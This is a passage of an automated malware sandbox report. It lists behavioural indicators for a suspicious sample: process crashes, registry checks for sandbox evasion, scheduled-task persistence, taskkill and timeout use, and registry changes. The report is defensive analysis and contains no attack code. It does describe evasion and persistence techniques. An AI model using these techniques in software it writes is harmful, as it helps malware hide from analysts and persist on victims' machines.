Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 30 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6488 1788 WerFault.exe 1mirsv0ngwj.exe 6704 1788 WerFault.exe 1mirsv0ngwj.exe 6920 1788 WerFault.exe 1mirsv0ngwj.exe 6988 1788 WerFault.exe 1mirsv0ngwj.exe 7112 1788 WerFault.exe 1mirsv0ngwj.exe 7748 1788 WerFault.exe 1mirsv0ngwj.exe 5276 1788 WerFault.exe 1mirsv0ngwj.exe 4316 15420 WerFault.exe 12pnnoeqvs1.exe 4732 15420 WerFault.exe 12pnnoeqvs1.exe 5452 15420 WerFault.exe 12pnnoeqvs1.exe 5612 15420 WerFault.exe 12pnnoeqvs1.exe 4980 15420 WerFault.exe 12pnnoeqvs1.exe 7652 15420 WerFault.exe 12pnnoeqvs1.exe 7320 15420 WerFault.exe 12pnnoeqvs1.exe 17956 7484 WerFault.exe MicrosoftEdgeCP.exe 11960 11804 WerFault.exe MicrosoftEdgeCP.exe 14992 7056 WerFault.exe hk0iyzzzx3b.exe 16444 7056 WerFault.exe hk0iyzzzx3b.exe 15272 7056 WerFault.exe hk0iyzzzx3b.exe 15316 7056 WerFault.exe hk0iyzzzx3b.exe 16040 7056 WerFault.exe hk0iyzzzx3b.exe 15288 7056 WerFault.exe hk0iyzzzx3b.exe 5892 7056 WerFault.exe hk0iyzzzx3b.exe 17380 14064 WerFault.exe aokmi1ieuny.exe 8116 14064 WerFault.exe aokmi1ieuny.exe 16452 14064 WerFault.exe aokmi1ieuny.exe 3824 14064 WerFault.exe aokmi1ieuny.exe 16140 14064 WerFault.exe aokmi1ieuny.exe 6996 14064 WerFault.exe aokmi1ieuny.exe 15456 14064 WerFault.exe aokmi1ieuny.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
schtasks.exesvchost.exesvchost.exeprivacytools5.exetapinstall.exeprivacytools5.exeDrvInst.exeDkMquET.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 schtasks.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 DkMquET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Setup.exeSetup.exegahkkRosw.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 gahkkRosw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString gahkkRosw.exe -
Creates scheduled task(s) 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 21452 17864 schtasks.exe 17132 schtasks.exe 24716 16984 schtasks.exe 1260 schtasks.exe 16204 22848 19420 592 5280 8320 16328 14548 schtasks.exe 10252 17480 16128 17952 schtasks.exe 8188 schtasks.exe 21600 23044 10668 schtasks.exe 7304 22304 8416 25668 10344 schtasks.exe 19120 17836 18868 13328 schtasks.exe 5752 schtasks.exe 16160 19956 8152 schtasks.exe 13244 20172 8488 17476 schtasks.exe 8328 18720 21472 12348 23392 9848 schtasks.exe 7508 schtasks.exe 11308 schtasks.exe 12164 728 13856 5856 schtasks.exe 5696 schtasks.exe 8724 schtasks.exe 15952 schtasks.exe 6900 11996 17524 schtasks.exe 9104 schtasks.exe 17280 schtasks.exe 5360 schtasks.exe 13112 schtasks.exe 15644 16008 9524 schtasks.exe -
Delays execution with timeout.exe 9 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 3896 timeout.exe 10112 timeout.exe 15236 timeout.exe 14820 timeout.exe 8564 11340 timeout.exe 14928 timeout.exe 12196 timeout.exe 16260 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
setup.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 53 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 19784 19888 23184 6544 taskkill.exe 12416 12856 taskkill.exe 8072 16888 taskkill.exe 21764 23488 24552 8588 24692 6964 taskkill.exe 17260 taskkill.exe 17104 taskkill.exe 6536 17124 5792 taskkill.exe 10952 taskkill.exe 16756 taskkill.exe 4936 24752 15152 taskkill.exe 10708 23520 9776 taskkill.exe 5480 taskkill.exe 23084 23232 21616 11772 15168 6160 taskkill.exe 10568 taskkill.exe 13596 8784 6112 taskkill.exe 4816 25592 16856 taskkill.exe 7632 taskkill.exe 12036 6716 7384 taskkill.exe 17336 8044 taskkill.exe 9232 taskkill.exe 6620 taskkill.exe 19852 3976 1096 taskkill.exe 18212 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exepowershell.exeDrvInst.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2532 = "Chatham Islands Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" mask_svc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-162 = "Central Standard Time" mask_svc.exe Set value (str) 